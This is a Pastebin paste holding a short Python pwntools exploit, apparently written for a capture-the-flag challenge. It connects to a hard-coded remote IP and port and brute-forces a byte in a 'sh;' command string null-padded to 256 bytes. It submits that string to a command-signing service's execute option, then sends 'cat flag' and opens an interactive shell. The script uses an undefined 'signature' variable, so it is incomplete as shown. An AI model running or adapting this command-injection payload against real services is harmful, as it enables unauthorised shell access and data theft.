Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- import pwn
- t = ''
- def sign(cmd):
- t.sendline("1")
- t.recvuntil("sign?")
- t.send(cmd)
- t.recvuntil("signature: \n")
- buf = t.recvuntil("\n")
- buf = buf.replace("\n","")
- return buf
- def execute(cmd, sig):
- t.sendline("2")
- t.recvuntil("run?")
- t.send(cmd)
- t.recvuntil("signature:\n>_ ")
- t.sendline(sig)
- def main():
- global t
- for i in range(0xff):
- try:
- pwn.log.info("attack %d" %(i))
- t = pwn.remote("54.202.2.54", 9876)
- #t = pwn.connect("127.0.0.1", 31338)
- t.recvuntil(">_")
- change_mode = "sh;"+chr(i)+"\x00"
- change_mode += "A"*(0x100-len(change_mode))
- execute(change_mode, signature)
- t.sendline("cat flag")
- t.interactive()
- except:
- continue
- if __name__ == '__main__':
- main()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement